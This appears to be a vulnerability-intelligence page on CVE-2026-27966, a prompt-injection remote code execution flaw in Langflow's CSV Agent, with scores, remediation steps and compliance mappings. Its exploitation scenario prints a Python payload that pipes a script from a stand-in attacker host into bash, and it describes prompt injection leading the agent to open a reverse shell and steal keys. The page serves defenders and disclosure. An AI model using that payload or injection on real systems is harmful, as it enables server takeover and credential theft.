CVE-2026-27966: Langflow Code Injection enables

Q: Is CVE-2026-27966 actively exploited?

A weaponized Metasploit module (exploit/multi/http/langflow_rce_cve_2026_27966) exists for CVE-2026-27966, meaning the exploit is point-and-click and the risk of opportunistic exploitation is high.

Q: How to fix CVE-2026-27966?

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

Q: What systems are affected by CVE-2026-27966?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM workflow automation platforms, CSV and document processing pipelines, RAG pipelines, Multi-agent orchestration systems, MLOps and AI development environments.

Q: What is the CVSS score for CVE-2026-27966?

CVE-2026-27966 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 33.69%.

CISO Take

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

What is the risk?

Severity is as high as it gets for AI framework vulnerabilities. The attack requires only network access and the ability to send input to the CSV Agent—no authentication, no complex exploitation chain. The hardcoded `allow_dangerous_code=True` flag is a design-level failure that permanently exposes the Python REPL to any user input that reaches the agent. AI/ML environments running Langflow are particularly high-risk because they often process untrusted external data (documents, CSVs from users) directly through agents, and the servers typically have broad cloud permissions and access to internal APIs, model inference endpoints, and datastores. Exposure is likely widespread given Langflow's popularity in enterprise AI workflow automation.

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Langflow	pip	—	No patch
149.9K Pushed 2d ago 40% patched ~67d to patch Full package profile →
Langflow	pip	<= 1.8.0rc2	No patch
149.9K Pushed 2d ago 40% patched ~67d to patch Full package profile →

How severe is it?

CVSS 3.1

9.8 / 10

EPSS

33.7%

chance of exploitation in 30 days

Higher than 98% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

✓ Weaponized Metasploit module (exploit/multi/http/langflow_rce_cve_2026_27966)

○ EPSS exploit prediction: 34%

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI None

S Unchanged

C High

I High

A High

What should I do?

1 step

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable Yes

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Prompt Injection Code Execution Framework RAG Agent AML.T0049 - Exploit Public-Facing Application AML.T0050 - Command and Scripting Interpreter AML.T0051 - LLM Prompt Injection AML.T0051.000 - Direct AML.T0051.001 - Indirect AML.T0053 - AI Agent Tool Invocation AML.T0054 - LLM Jailbreak AML.T0055 - Unsecured Credentials AML.T0072 - Reverse Shell AML.T0081 - Modify AI Agent Configuration AML.T0083 - Credentials from AI Agent Configuration AML.T0105 - Escape to Host

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Art. 15 - Accuracy, Robustness and Cybersecurity Art.15 - Accuracy, Robustness and Cybersecurity Art.9 - Risk Management System

ISO 42001

6.1.2 - AI Risk Assessment 8.4 - AI System Risk Management 8.7 - AI System Security

NIST AI RMF

GOVERN 1.2 - Accountability and Policies for AI Risk GOVERN-1.7 - Processes for identifying and managing AI risks MANAGE 2.2 - Mechanisms to Respond to and Recover from AI Risks MANAGE-2.4 - Risks and benefits of the AI system are communicated

OWASP LLM Top 10

LLM01 - Prompt Injection LLM01:2025 - Prompt Injection LLM02:2025 - Insecure Output Handling LLM07 - Insecure Plugin Design LLM08 - Excessive Agency LLM08:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-27966?

CVE-2026-27966 is a trivially exploitable, unauthenticated RCE in Langflow's CSV Agent node—CVSS 9.8, no privileges required, no user interaction needed. Any organization running Langflow prior to 1.8.0 with internet-accessible instances should treat this as an active incident: patch immediately or take the service offline. If patching is not immediate, isolate Langflow behind a VPN or firewall and audit server logs for unexpected outbound connections or process spawning.

Is CVE-2026-27966 actively exploited?

A weaponized Metasploit module (exploit/multi/http/langflow_rce_cve_2026_27966) exists for CVE-2026-27966, meaning the exploit is point-and-click and the risk of opportunistic exploitation is high.

How to fix CVE-2026-27966?

1) PATCH: Upgrade Langflow to v1.8.0 immediately—this is the primary remediation. 2) ISOLATE: If patching is not immediately possible, restrict Langflow access to trusted internal networks only; do not expose to the internet. 3) AUDIT: Review server logs for anomalous subprocess spawning, outbound network connections, or access to sensitive files (env vars, SSH keys, cloud credentials). 4) ROTATE CREDENTIALS: Assume any API keys, database passwords, or cloud tokens accessible from the Langflow server may be compromised. Rotate them proactively. 5) SCAN: Identify all Langflow instances in your environment via asset inventory—containerized deployments in Kubernetes namespaces may be overlooked. 6) DETECT: Add monitoring rules for Python REPL invocations, unexpected child process creation from Langflow's PID, and outbound connections to unusual destinations. 7) REVIEW ARCHITECTURE: Audit all LangChain-based agent nodes in your Langflow workflows for other hardcoded dangerous flags. 8) NETWORK SEGMENTATION: Ensure Langflow servers do not have direct internet egress—use egress filtering to limit blast radius of any RCE.

What systems are affected by CVE-2026-27966?

This vulnerability affects the following AI/ML architecture patterns: Agent frameworks, LLM workflow automation platforms, CSV and document processing pipelines, RAG pipelines, Multi-agent orchestration systems, MLOps and AI development environments.

What is the CVSS score for CVE-2026-27966?

CVE-2026-27966 has a CVSS v3.1 base score of 9.8 (CRITICAL). The EPSS exploitation probability is 33.69%.

What is the AI security impact?

Affected AI Architectures

Agent frameworksLLM workflow automation platformsCSV and document processing pipelinesRAG pipelinesMulti-agent orchestration systemsMLOps and AI development environments

MITRE ATLAS Techniques

AML.T0049 Exploit Public-Facing Application

AML.T0050 Command and Scripting Interpreter

AML.T0051 LLM Prompt Injection

AML.T0051.000 Direct

AML.T0051.001 Indirect

AML.T0053 AI Agent Tool Invocation

AML.T0054 LLM Jailbreak

AML.T0055 Unsecured Credentials

AML.T0072 Reverse Shell

AML.T0081 Modify AI Agent Configuration

AML.T0083 Credentials from AI Agent Configuration

AML.T0105 Escape to Host

Compliance Controls Affected

EU AI Act: Art. 15, Art.15, Art.9

ISO 42001: 6.1.2, 8.4, 8.7

NIST AI RMF: GOVERN 1.2, GOVERN-1.7, MANAGE 2.2, MANAGE-2.4

OWASP LLM Top 10: LLM01, LLM01:2025, LLM02:2025, LLM07, LLM08, LLM08:2025

What are the technical details?

Original Advisory

Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.8.0, the CSV Agent node in Langflow hardcodes `allow_dangerous_code=True`, which automatically exposes LangChain’s Python REPL tool (`python_repl_ast`). As a result, an attacker can execute arbitrary Python and OS commands on the server via prompt injection, leading to full Remote Code Execution (RCE). Version 1.8.0 fixes the issue.

Exploitation Scenario

An adversary identifies a publicly accessible Langflow instance (e.g., via Shodan, exposed corporate AI portal, or leaked URL). They craft a malicious CSV file or direct prompt input to the CSV Agent node that injects a Python payload—e.g., `__import__('os').system('curl attacker.com/shell.sh | bash')`. Because `allow_dangerous_code=True` is hardcoded, the LangChain Python REPL executes the payload without restriction. The attacker establishes a reverse shell on the Langflow server, extracts environment variables containing OpenAI/Anthropic API keys, database connection strings, and AWS IAM credentials. They then pivot to the organization's vector database, exfiltrate the RAG corpus containing proprietary documents, and use the harvested cloud credentials to access S3 buckets or model registries. The entire attack chain requires zero authentication and can be automated.

Weaknesses (CWE)

CWE-94 Improper Control of Generation of Code ('Code Injection') Primary CWE-94 Improper Control of Generation of Code ('Code Injection')

CWE-94 — Improper Control of Generation of Code ('Code Injection'): The product constructs all or part of a code segment using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the syntax or behavior of the intended code segment.

[Architecture and Design] Refactor your program so that you do not have to dynamically generate code.
[Architecture and Design] Run your code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which code can be executed by your product. Examples include the Unix chroot jail and AppArmor. In general, managed code may provide some protection. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of your application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.